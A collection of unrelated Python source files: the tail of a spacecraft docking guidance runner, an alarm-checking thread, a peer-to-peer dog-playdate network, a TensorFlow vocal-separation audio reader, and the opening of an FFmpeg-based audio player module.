deep_guidance_acceleration_signal_to_pi = str(deep_guidance[0]) + "\n" + str(deep_guidance[1]) + "\n" + str(deep_guidance[2]) + "\n" + str(deep_guidance[3]) + "\n" + str(deep_guidance[4]) + "\n" + str(deep_guidance[5]) + "\n" + str(self.have_we_docked) + "\n"
self.client_socket.send(deep_guidance_acceleration_signal_to_pi.encode())
if counter % 2000 == 0:
print("Output to Pi: ", deep_guidance, " In table inertial frame or joint frame")
print(normalized_policy_input)
# Incrementing the counter
counter = counter + 1
# Log this timestep's data only if the experiment has actually started
if Pi_time > 0:
data_log.append([Pi_time, deep_guidance[0], deep_guidance[1], deep_guidance[2], \
deep_guidance[3], deep_guidance[4], deep_guidance[5], \
Pi_red_x, Pi_red_y, Pi_red_theta, \
Pi_red_Vx, Pi_red_Vy, Pi_red_omega, \
Pi_black_x, Pi_black_y, Pi_black_theta, \
Pi_black_Vx, Pi_black_Vy, Pi_black_omega, \
shoulder_theta, elbow_theta, wrist_theta, \
shoulder_omega, elbow_omega, wrist_omega, self.have_we_docked])
print("Model gently stopped.")
if len(data_log) > 0:
print("Saving data to file...",end='')
with open('deep_guidance_data_' + time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime()) + '.txt', 'wb') as f:
np.save(f, np.asarray(data_log))
else:
print("Not saving a log because there is no data to write")
print("Done!")
# Close tensorflow session
self.sess.close()
##################################################
#### Start communication with JetsonRepeater #####
##################################################
if testing:
client_socket = 0
else:
# Looping forever until we are connected
while True:
try: # Try to connect
client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_socket.connect("/tmp/jetsonRepeater") # Connecting...
client_socket.settimeout(2) # Setting the socket timeout to 2 seconds
print("Connected to JetsonRepeater!")
break
except: # If connection attempt failed
print("Connection to JetsonRepeater FAILED. Trying to re-connect in 1 second")
time.sleep(1)
# WE ARE CONNECTED
# Generate Queues
messages_to_deep_guidance = deque(maxlen = 1)
#####################
### START THREADS ###
#####################
all_threads = []
stop_run_flag = threading.Event() # Flag to stop all threads
# Initialize Message Parser
message_parser = MessageParser(testing, client_socket, messages_to_deep_guidance, stop_run_flag)
# Initialize Deep Guidance Model
deep_guidance_model = DeepGuidanceModelRunner(testing, client_socket, messages_to_deep_guidance, stop_run_flag)
all_threads.append(threading.Thread(target = message_parser.run))
all_threads.append(threading.Thread(target = deep_guidance_model.run))
#############################################
##### STARTING EXECUTION OF ALL THREADS #####
#############################################
# #
# #
for each_thread in all_threads: #
# #
each_thread.start() #
# #
# #
#############################################
############## THREADS STARTED ##############
#############################################
counter_2 = 1
try:
while True:
time.sleep(0.5)
if counter_2 % 200 == 0:
print("100 seconds in, trying to stop gracefully")
stop_run_flag.set()
for each_thread in all_threads:
each_thread.join()
break
except KeyboardInterrupt:
print("Interrupted by user. Ending gently")
stop_run_flag.set()
for each_thread in all_threads:
each_thread.join()
print('Done :)')
|
AlarmCheck.py
|
import threading
import time
import AlarmStorage
# import LedController
class AlarmCheck(object):
""" Threading example class
The run() method will be started and it will run in the background
until the application exits.
"""
def __init__(self, interval=30):
""" Constructor
:type interval: int
:param interval: Check interval, in seconds
"""
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
print("alarm check started at: " + time.strftime('%X %x %Z'))
alarmflag = 99999
while True:
""" if alarm is updated, make sure we check for new ones """
alarms = AlarmStorage.ReturnAlarmsInJson()
alarmtime = ((time.localtime().tm_hour * 60) + time.localtime().tm_min)
dayindex = time.localtime().tm_wday
            # Remap tm_wday (Monday=0 .. Sunday=6) to the stored alarm indexing (Sunday=0 .. Saturday=6)
if dayindex == 6:
dayindex = 0
else:
dayindex += 1
# print("alarmflag "+str(alarmflag)+" alarmtime "+str(alarmtime) +" != "+ str(alarmflag != alarmtime))
# see if have an alarm at this time, and that we haven't alerted for it already for today
if str(alarmtime) in alarms.keys() and alarmflag != alarmtime+dayindex:
# make sure the alarm is active and make sure it should be alerted today.
if alarms[str(alarmtime)]['isActive'] == u'1' and alarms[str(alarmtime)]['days'][dayindex] == 1:
# alarm time plus the day index makes sure the triggering is only for a specific day and time.
alarmflag = alarmtime+dayindex
print("trigger alarm: " + str(alarmtime))
# LedController.slow_illumination()
time.sleep(self.interval)
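# Usage sketch (illustrative): the constructor starts its own daemon thread, so
# the caller only has to keep the main process alive, e.g.
#
#     checker = AlarmCheck(interval=30)
#     while True:
#         time.sleep(60)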
|
puppyplaydate.py
|
# This performs the under-the-hood logic for puppyplaydate using btpeer
from btpeer import *
import json
# PuppyPlaydate message types
GETPEERS="GPER"
GETREPL="GREP"
ADDFRIEND = "ADDF"
MEET = "MEET"
MEETREPLY = "MREP"
QUERY = "QUER"
QRESP = "QRES"
# Underlying required message types
INFO = "INFO"
LISTPEERS = "LIST"
QUIT = "QUIT"
REPLY="REPL"
ERROR="ERRO"
class PuppyPlaydate(BTPeer):
def __init__(self, maxpeers, serverport):
BTPeer.__init__(self, maxpeers, serverport)
self.meetups = {} # Requested and Sent meetup information
self.dogs = {} # Known dogs in format of { peerid: [{owner, name, age, breed}, ...]}
self.addrouter(self.__router)
handlers = {LISTPEERS : self.handle_listpeers,
GETPEERS: self.handle_getpeers,
GETREPL : self.handle_getpeers_reply,
ADDFRIEND : self.handle_insertpeer,
INFO: self.handle_peername,
MEET: self.handle_meet,
MEETREPLY: self.handle_meet_reply,
QRESP: self.handle_qresponse,
QUERY: self.handle_query,
QUIT: self.handle_quit
}
for mt in handlers:
self.addhandler(mt, handlers[mt])
def handle_quit(self, peerconn, data):
"""
Handles a peer trying to disconnect from a target node's network,
aka 'unfriending' them.
"""
self.peerlock.acquire()
try:
peerid = data.lstrip().rstrip()
if peerid in self.getpeerids():
msg = 'Quit: peer removed: %s' % peerid
self.__debug(msg)
peerconn.senddata(REPLY, msg)
self.removepeer(peerid)
else:
msg = 'Quit: peer not found: %s' % peerid
self.__debug(msg)
peerconn.senddata(ERROR, msg)
finally:
self.peerlock.release()
def handle_listpeers(self, peerconn, data):
""" Handles the LISTPEERS message type. Message data is not used.
"""
self.peerlock.acquire()
try:
self.__debug('Listing peers %d' % self.numberofpeers())
peerconn.senddata(REPLY, '%d' % self.numberofpeers())
for pid in self.getpeerids():
host,port = self.getpeer(pid)
peerconn.senddata(REPLY, '%s %s %d' % (pid, host, port))
finally:
self.peerlock.release()
def handle_getpeers(self, peerconn, data):
"""
Lists all of a target node's known peers
"""
self.peerlock.acquire()
try:
print "Sending back", self.getpeerids()
host, port = data.split(':')
self.connectandsend(host, port, GETREPL, json.dumps(self.getpeerids()))
finally:
self.peerlock.release()
def handle_getpeers_reply(self, peerconn, data):
"""
Handles GREP message - adds all the peers returned from the target
node to its own peerlist
"""
self.peerlock.acquire()
try:
try:
peerList = json.loads(data) #[host:port, host:port]
if self.maxpeersreached():
self.__debug('maxpeers %d reached: connection terminating'
% self.maxpeers)
peerconn.senddata(ERROR, 'Join: too many peers')
return
# peerid = '%s:%s' % (host,port)
for peerid in peerList:
print peerid
if peerid not in self.getpeerids() and peerid != self.myid:
host,port = peerid.split(':')
self.addpeer(peerid, host, port)
                        print 'added peer: ' + peerid
peerconn.senddata(REPLY, 'Join: peer added: %s' % peerid)
else:
peerconn.senddata(ERROR, 'Join: peer already inserted %s'
% peerid)
except:
self.__debug('invalid insert %s: %s' % (str(peerconn), data))
peerconn.senddata(ERROR, 'Join: incorrect arguments')
finally:
self.peerlock.release()
def handle_insertpeer(self, peerconn, data):
"""
Handles inserting a peer into node's known peers list
"""
self.peerlock.acquire()
try:
try:
peerid,host,port = data.split()
if self.maxpeersreached():
self.__debug('maxpeers %d reached: connection terminating'
% self.maxpeers)
peerconn.senddata(ERROR, 'Join: too many peers')
return
# peerid = '%s:%s' % (host,port)
if peerid not in self.getpeerids() and peerid != self.myid:
self.addpeer(peerid, host, port)
                    print 'added peer: ' + peerid
peerconn.senddata(REPLY, 'Join: peer added: %s' % peerid)
else:
peerconn.senddata(ERROR, 'Join: peer already inserted %s'
% peerid)
except:
self.__debug('invalid insert %s: %s' % (str(peerconn), data))
peerconn.senddata(ERROR, 'Join: incorrect arguments')
finally:
self.peerlock.release()
def handle_peername(self, peerconn, data):
peerconn.senddata(REPLY, self.myid)
def buildpeers(self, host, port, hops):
"""
Will add first-level peers to known peers list (NON-RECURSIVE)
"""
if self.maxpeersreached() or not hops:
return
peerid = None
self.__debug("Building peers from (%s,%s)" % (host,port))
try:
_, peerid = self.connectandsend(host, port, INFO, '')[0]
self.__debug("contacted " + peerid)
resp = self.connectandsend(host, port, ADDFRIEND,
'%s %s %d' % (self.myid,
self.serverhost,
self.serverport))[0]
self.__debug(str(resp))
if (resp[0] != REPLY) or (peerid in self.getpeerids()):
return
self.addpeer(peerid, host, port)
#
# # do recursive depth first search to add more peers
# resp = self.connectandsend(host, port, LISTPEERS, '',
# pid=peerid)
# if len(resp) > 1:
# resp.reverse()
# resp.pop() # get rid of header count reply
# while len(resp):
# nextpid,host,port = resp.pop()[1].split()
# if nextpid != self.myid:
# self.buildpeers(host, port, hops - 1)
except:
if self.debug:
traceback.print_exc()
self.removepeer(peerid)
def addlocaldog(self, data):
"""
Adds new dog info, should be following structure:
owner name breed age
"""
owner, name, breed, age = data.split()
try:
self.dogs[self.myid].append({'owner': owner, 'name': name, 'breed': breed, 'age': age})
except:
self.dogs[self.myid] = []
self.dogs[self.myid].append({'owner': owner, 'name': name, 'breed': breed, 'age': age})
def handle_query(self, peerconn, data):
"""
This handles the QUERY message type
and will check if their dog matches the sent data,
else will propagate the message to immediate neighbors.
Data should be in following format:
returnPID owner name breed age OR
owner OR
ret_pid
"""
try:
ret_pid, owner, name, breed, age = data.split()
t = threading.Thread(target=self.process_full_query, args=[ret_pid, owner, name, breed, age])
t.start()
except:
try:
ret_pid, owner = data.split()
t = threading.Thread(target=self.process_owner_query, args=[ret_pid, owner])
t.start()
except:
ret_pid = data
t = threading.Thread(target=self.process_peerid_query, args=[peerconn, ret_pid])
t.start()
def process_full_query(self, ret_pid, owner, name, breed, age):
"""
Process a search QUERY that contains full dog information:
owner name breed age
"""
for peerid, dogList in self.dogs.iteritems():
for dog in dogList:
if owner == dog['owner'] and name == dog['name'] and breed == dog['breed'] and age == dog['age']:
host, port = ret_pid.split(":")
data = { peerid: dogList }
self.connectandsend(host, int(port), QRESP, json.dumps(data, encoding='utf-8'), pid=ret_pid)
return
# Dog not found in known dogs, propagate to peers
for next in self.getpeerids():
            data = ' '.join([ret_pid, owner, name, breed, age])
self.sendtopeer(next, QUERY, data)
def process_peerid_query(self, peerconn, ret_pid):
"""
Processes query asking for directly connected node's dogs they own
"""
# FIXME: ValueError: too many values to unpack on 250
print ret_pid
host, port = ret_pid.split(':')
try:
data = { self.myid: self.dogs[self.myid] }
except:
data = { self.myid: [] }
self.connectandsend(host, int(port), QRESP, json.dumps(data, encoding='utf-8'), pid=ret_pid)
def process_owner_query(self, ret_pid, owner):
"""
Processes query with just an owner's name
"""
for peerid, dogList in self.dogs.iteritems():
for dog in dogList:
if owner == dog['owner']: #send back all dogs
host, port = ret_pid.split(':')
data = { peerid: dogList }
self.connectandsend(host, int(port), QRESP, json.dumps(data, encoding='utf-8'), pid=ret_pid)
return
# Owner not found in known dogs, propagate to peers
for next in self.getpeerids():
            self.sendtopeer(next, QUERY, '%s %s' % (ret_pid, owner))
def handle_qresponse(self, peerconn, data):
"""
Handles the different responses possible from the 3 query types
"""
try:
data = json.loads(data) #{peerid: [{}, {}]}
peerid = next(iter(data))
dogList = data[peerid] #[{}, {}]
self.dogs[peerid] = []
for dog in dogList:
dog['owner'] = dog['owner'].encode('ascii', 'replace')
dog['name'] = dog['name'].encode('ascii', 'replace')
dog['breed'] = dog['breed'].encode('ascii', 'replace')
dog['age'] = dog['age'].encode('ascii', 'replace')
self.dogs[peerid].append({'owner': dog['owner'], 'name': dog['name'], 'breed': dog['breed'], 'age': dog['age']})
except:
            self.__debug('Error handling query response.')
def handle_meet(self, peerconn, data):
"""
Handles a meetup request from a peer.
"""
try:
peerid, location, date, time = data.split()
self.meetups[peerid] = { 'to': self.myid, 'location': location, 'date': date, 'time': time, 'accepted': None }
except:
peerconn.senddata(ERROR, 'Error delivering meetup request')
def handle_meet_reply(self, peerconn, data):
"""
Handles response to a meetup request (yes or no)
If Yes, change the corresponding request's 'Accepted' parameter to True
If No, change the corresponding request's 'Accepted' parameter to False
"""
toId, answer = data.split()
for fromId in self.meetups:
if self.meetups[fromId]['to'] == toId:
if answer == 'Yes':
self.meetups[fromId]['accepted'] = True
else:
self.meetups[fromId]['accepted'] = False
def __router(self, peerid):
if peerid not in self.getpeerids():
return (None, None, None)
else:
rt = [peerid]
rt.extend(self.peers[peerid])
return rt
def __debug(self, msg):
if self.debug:
btdebug(msg)
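# Usage sketch (illustrative; host, port and dog data are assumptions, and
# mainloop() is assumed to be BTPeer's listening loop from the btpeer module):
#
#     node = PuppyPlaydate(maxpeers=10, serverport=5678)
#     threading.Thread(target=node.mainloop).start()   # start accepting connections
#     node.buildpeers('192.168.1.20', 5678, hops=1)    # learn a bootstrap peer
#     node.addlocaldog('alice rex corgi 3')            # owner name breed age
#     # Ask a known peer for its dogs; replies arrive via handle_qresponse()
#     node.sendtopeer(next(iter(node.getpeerids())), QUERY, node.myid)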
|
AudioReaderVS.py
|
import fnmatch
import os
import random
import re
import threading
import librosa
import numpy as np
import tensorflow as tf
import soundfile as sf
FILE_PATTERN = r'p([0-9]+)_([0-9]+)\.wav'
def get_category_cardinality(files):
id_reg_expression = re.compile(FILE_PATTERN)
min_id = None
max_id = None
for filename in files:
matches = id_reg_expression.findall(filename)[0]
id, recording_id = [int(id_) for id_ in matches]
if min_id is None or id < min_id:
min_id = id
if max_id is None or id > max_id:
max_id = id
return min_id, max_id
def randomize_files(files):
for file in files:
file_index = random.randint(0, (len(files) - 1))
yield files[file_index]
def find_files(directory, pattern='*.wav'):
'''Recursively finds all files matching the pattern.'''
files = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, pattern):
files.append(os.path.join(root, filename))
return files
def load_one_audio(directory, sample_rate,trainOrNot=True):
if(trainOrNot):
allfiles = [['./vsCorpus/origin_mix.wav','./vsCorpus/origin_vocal.wav']]
else:
allfiles = [['./vsCorpus/pred_mix.wav','./vsCorpus/pred_vocal.wav']]
for filename in allfiles:
audio0, samplerate = sf.read(filename[0], dtype='float32')
audio0 = librosa.resample(audio0.T, samplerate, sample_rate)
audio0 = audio0.reshape(-1, 1)
audio1, samplerate = sf.read(filename[1], dtype='float32')
audio1 = librosa.resample(audio1.T, samplerate, sample_rate)
audio1 = audio1.reshape(-1, 1)
assert(audio0.shape==audio1.shape)
yield audio0,audio1, filename, 0
def load_generic_audio(directory, sample_rate):
'''Generator that yields audio waveforms from the directory.'''
files = find_files(directory)
id_reg_exp = re.compile(FILE_PATTERN)
print("files length: {}".format(len(files)))
randomized_files = randomize_files(files)
for filename in randomized_files:
#print(filename)
ids = id_reg_exp.findall(filename)
#print(ids)
if not ids:
# The file name does not match the pattern containing ids, so
# there is no id.
category_id = None
else:
# The file name matches the pattern for containing ids.
category_id = int(ids[0][0])
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
#print(librosa.load(filename, sr=sample_rate, mono=True)[0].shape) #(65584,) 16000
#print(librosa.load(filename, mono=True)[0].shape,librosa.load(filename, mono=True)[1]) #(90383,) 22050
#(65584,) 16000 ((65584,) / 16000 == (90383,) 22050)True
audio = audio.reshape(-1, 1)
#print(filename, category_id)
yield audio, filename, category_id
def trim_silence(audio0,audio1, threshold, frame_length=2048):
'''Removes silence at the beginning and end of a sample.'''
if audio0.size < frame_length:
frame_length = audio0.size
energy = librosa.feature.rmse(audio0, frame_length=frame_length//2)
frames = np.nonzero(energy > threshold)
indices = librosa.core.frames_to_samples(frames)[1]
#print('frame',librosa.core.frames_to_samples(frames))
# Note: indices can be an empty array, if the whole audio was silence.
if(len(indices)):return audio0[indices[0]:indices[-1]],audio1[indices[0]:indices[-1]]
return audio0[0:0],audio1[0:0]
def not_all_have_id(files):
''' Return true iff any of the filenames does not conform to the pattern
we require for determining the category id.'''
id_reg_exp = re.compile(FILE_PATTERN)
for file in files:
ids = id_reg_exp.findall(file)
if not ids:
return True
return False
class AudioReader(object):
'''Generic background audio reader that preprocesses audio files
and enqueues them into a TensorFlow queue.'''
def __init__(self,
audio_dir,
coord,
sample_rate,
gc_enabled,
receptive_field,
sample_size=None,
silence_threshold=None,
queue_size=32):
self.audio_dir = audio_dir
self.sample_rate = sample_rate
self.coord = coord
self.sample_size = sample_size
self.receptive_field = receptive_field
self.silence_threshold = silence_threshold
self.gc_enabled = gc_enabled
self.threads = []
self.trxsample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.trysample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
self.trxqueue = tf.PaddingFIFOQueue(1,['float32'],shapes=[(None, 1)])
self.tryqueue = tf.PaddingFIFOQueue(1,['float32'],shapes=[(None, 1)])
self.trxenqueue = self.trxqueue.enqueue([self.trxsample_placeholder])
self.tryenqueue = self.tryqueue.enqueue([self.trysample_placeholder])
#self.vxsample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
#self.vysample_placeholder = tf.placeholder(dtype=tf.float32, shape=None)
#self.vxqueue = tf.PaddingFIFOQueue(4,['float32'],shapes=[(None, 1)])
#self.vyqueue = tf.PaddingFIFOQueue(4,['float32'],shapes=[(None, 1)])
#self.vxenqueue = self.vxqueue.enqueue([self.vxsample_placeholder])
#self.vyenqueue = self.vyqueue.enqueue([self.vysample_placeholder])
if self.gc_enabled:
##TODO trxaudio,tryaudio
pass
self.id_placeholder = tf.placeholder(dtype=tf.int32, shape=())
self.gc_queue = tf.PaddingFIFOQueue(queue_size, ['int32'],
shapes=[()])
self.gc_enqueue = self.gc_queue.enqueue([self.id_placeholder])
# TODO Find a better way to check this.
# Checking inside the AudioReader's thread makes it hard to terminate
# the execution of the script, so we do it in the constructor for now.
files = find_files(audio_dir)
if not files:
raise ValueError("No audio files found in '{}'.".format(audio_dir))
if self.gc_enabled and not_all_have_id(files):
raise ValueError("Global conditioning is enabled, but file names "
"do not conform to pattern having id.")
# Determine the number of mutually-exclusive categories we will
        # accommodate in our embedding table.
if self.gc_enabled:
##TODO xaudio,yaudio
pass
_, self.gc_category_cardinality = get_category_cardinality(files)
# Add one to the largest index to get the number of categories,
# since tf.nn.embedding_lookup expects zero-indexing. This
# means one or more at the bottom correspond to unused entries
# in the embedding lookup table. But that's a small waste of memory
            # to keep the code simpler, and preserves correspondence between
# the id one specifies when generating, and the ids in the
# file names.
self.gc_category_cardinality += 1
print("Detected --gc_cardinality={}".format(
self.gc_category_cardinality))
else:
self.gc_category_cardinality = None
def trdequeue(self, num_elements):
print('trdequeue')
output = (self.trxqueue.dequeue_many(num_elements),self.tryqueue.dequeue_many(num_elements))
return output
'''def vdequeue(self, num_elements):
print('vdequeue')
output = (self.vxqueue.dequeue_many(num_elements),self.vyqueue.dequeue_many(num_elements))
return output'''
def dequeue_gc(self, num_elements):
##TODO trxaudio,tryaudio
pass
return self.gc_queue.dequeue_many(num_elements)
def valbatch(self):
stop = False
#filename = ['./vsCorpus/origin_mix.wav','./vsCorpus/origin_vocal.wav']
filename = ['./vsCorpus/pred_mix.wav','./vsCorpus/pred_vocal.wav']
#print('val',filename)
audio0, samplerate = sf.read(filename[0], dtype='float32')
audio0 = librosa.resample(audio0.T, samplerate, self.sample_rate)
audio0 = audio0.reshape(-1, 1)
audio1, samplerate = sf.read(filename[1], dtype='float32')
audio1 = librosa.resample(audio1.T, samplerate, self.sample_rate)
audio1 = audio1.reshape(-1, 1)
assert(audio0.shape==audio1.shape)
vxaudio = np.pad(audio0, [[self.receptive_field, 0], [0, 0]],'constant')
vyaudio = np.pad(audio1, [[self.receptive_field, 0], [0, 0]],'constant')
vxaudio=tf.convert_to_tensor(vxaudio, dtype=tf.float32)
vyaudio=tf.convert_to_tensor(vyaudio, dtype=tf.float32)
return (vxaudio,vyaudio)
def thread_train(self, sess):
stop = False
# Go through the dataset multiple times
filename = ['./vsCorpus/origin_mix.wav','./vsCorpus/origin_vocal.wav']
audio0, samplerate = sf.read(filename[0], dtype='float32')
audio0 = librosa.resample(audio0.T, samplerate, self.sample_rate)
audio0 = audio0.reshape(-1, 1)
audio0 = np.pad(audio0, [[self.receptive_field, 0], [0, 0]],'constant')
audio1, samplerate = sf.read(filename[1], dtype='float32')
audio1 = librosa.resample(audio1.T, samplerate, self.sample_rate)
audio1 = audio1.reshape(-1, 1)
audio1 = np.pad(audio1, [[self.receptive_field, 0], [0, 0]],'constant')
assert(audio0.shape==audio1.shape)
while not stop:
if self.coord.should_stop():
stop = True
break
if self.silence_threshold is not None:
# Remove silence
                audio0, audio1 = trim_silence(audio0[:, 0], audio1[:, 0], self.silence_threshold)
                audio0, audio1 = audio0.reshape(-1, 1), audio1.reshape(-1, 1)
                if audio0.size == 0:
                    print("Warning: {} was ignored as it contains only "
                          "silence. Consider decreasing trim_silence "
                          "threshold, or adjust the volume of the audio."
                          .format(filename))
#print(self.sample_size)
if self.sample_size: ##SAMPLE_SIZE = 100000
# Cut samples into pieces of size receptive_field +
# sample_size with receptive_field overlap
#receptive_field=5117
lens = self.sample_size+self.receptive_field
startnum = np.arange(len(audio0)-lens)
np.random.shuffle(startnum)
#print('train',startnum)
for i in startnum:
#print('trx',sess.run(self.trxqueue.size()))
#print('try',sess.run(self.tryqueue.size()))
#print('tr',filename)
trxpiece = audio0[i:i+lens, :]+np.random.randn(lens,1)*(1e-5)
trxpiece = np.pad(trxpiece, [[self.receptive_field, 0], [0, 0]],'constant')
sess.run(self.trxenqueue,feed_dict={self.trxsample_placeholder: trxpiece})
trypiece = audio1[i:i+lens, :]+np.random.randn(lens,1)*(1e-5)
trypiece = np.pad(trypiece, [[self.receptive_field, 0], [0, 0]],'constant')
sess.run(self.tryenqueue,feed_dict={self.trysample_placeholder: trypiece})
if self.gc_enabled:
                        pass  # TODO: derive category_id for global conditioning before enqueueing
                        # sess.run(self.gc_enqueue, feed_dict={self.id_placeholder: category_id})
'''while len(trxaudio) > self.receptive_field:
trxpiece = trxaudio[:(self.receptive_field +self.sample_size), :]
sess.run(self.trxenqueue,feed_dict={self.trxsample_placeholder: trxpiece})
trxaudio = trxaudio[self.sample_size:, :]
trypiece = tryaudio[:(self.receptive_field +self.sample_size), :]
sess.run(self.tryenqueue,feed_dict={self.trysample_placeholder: trypiece})
tryaudio = tryaudio[self.sample_size:, :]'''
'''else:
sess.run(self.trxenqueue,feed_dict={self.trxsample_placeholder: trxaudio})
sess.run(self.tryenqueue,feed_dict={self.trysample_placeholder: tryaudio})
if self.gc_enabled:
##TODO trxaudio,tryaudio
pass
sess.run(self.gc_enqueue,
feed_dict={self.id_placeholder: category_id})'''
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread0 = threading.Thread(target=self.thread_train, args=(sess,))
thread0.daemon = True # Thread will close when parent quits.
thread0.start()
self.threads.append(thread0)
return self.threads
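# Usage sketch (illustrative; hyper-parameter values are assumptions, the corpus
# path matches the hard-coded ./vsCorpus files used above):
#
#     coord = tf.train.Coordinator()
#     reader = AudioReader('./vsCorpus', coord, sample_rate=16000, gc_enabled=False,
#                          receptive_field=5117, sample_size=100000)
#     x_batch, y_batch = reader.trdequeue(1)   # paired mix / vocal tensors
#     with tf.Session() as sess:
#         reader.start_threads(sess)
#         x, y = sess.run([x_batch, y_batch])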
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2021 xXSergeyXx
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------
Авторские права (c) 2021 xXSergeyXx
Данная лицензия разрешает лицам, получившим копию данного программного
обеспечения и сопутствующей документации (в дальнейшем именуемыми «Программное обеспечение»),
безвозмездно использовать Программное обеспечение без ограничений, включая неограниченное
право на использование, копирование, изменение, слияние, публикацию, распространение,
сублицензирование и/или продажу копий Программного обеспечения, а также лицам, которым
предоставляется данное Программное обеспечение, при соблюдении следующих условий:
Указанное выше уведомление об авторском праве и данные условия должны быть включены во
все копии или значимые части данного Программного обеспечения.
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ», БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ, ЯВНО ВЫРАЖЕННЫХ
ИЛИ ПОДРАЗУМЕВАЕМЫХ, ВКЛЮЧАЯ ГАРАНТИИ ТОВАРНОЙ ПРИГОДНОСТИ, СООТВЕТСТВИЯ ПО ЕГО КОНКРЕТНОМУ
НАЗНАЧЕНИЮ И ОТСУТСТВИЯ НАРУШЕНИЙ, НО НЕ ОГРАНИЧИВАЯСЬ ИМИ. НИ В КАКОМ СЛУЧАЕ АВТОРЫ ИЛИ ПРАВООБЛАДАТЕЛИ
НЕ НЕСУТ ОТВЕТСТВЕННОСТИ ПО КАКИМ-ЛИБО ИСКАМ, ЗА УЩЕРБ ИЛИ ПО ИНЫМ ТРЕБОВАНИЯМ, В ТОМ ЧИСЛЕ, ПРИ
ДЕЙСТВИИ КОНТРАКТА, ДЕЛИКТЕ ИЛИ ИНОЙ СИТУАЦИИ, ВОЗНИКШИМ ИЗ-ЗА ИСПОЛЬЗОВАНИЯ ПРОГРАММНОГО
ОБЕСПЕЧЕНИЯ ИЛИ ИНЫХ ДЕЙСТВИЙ С ПРОГРАММНЫМ ОБЕСПЕЧЕНИЕМ.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
        If the audio is complete, return an empty
        :term:`py:bytes-like object` to signal the end of the stream.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
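# Illustrative sketch, not part of the original library: a minimal AudioSource
# subclass that plays silence, written only to make the read() contract above
# concrete (20ms of 16-bit 48KHz stereo PCM is 3,840 bytes per frame). The
# class name and its duration parameter are hypothetical.
class _SilenceExample(AudioSource):
    FRAME_SIZE = 3840  # 20ms of 16-bit 48KHz stereo PCM
    def __init__(self, duration: float = 1.0) -> None:
        # number of 20ms frames to emit before signalling completion
        self._frames_left = int(duration / 0.02)
    def read(self) -> bytes:
        if self._frames_left <= 0:
            return b''  # an empty bytes-like object signals the end of the stream
        self._frames_left -= 1
        return b'\x00' * self.FRAME_SIZE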
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
    User-created AudioSources that use FFmpeg differently from how :class:`FFmpegPCMAudio` and
    :class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
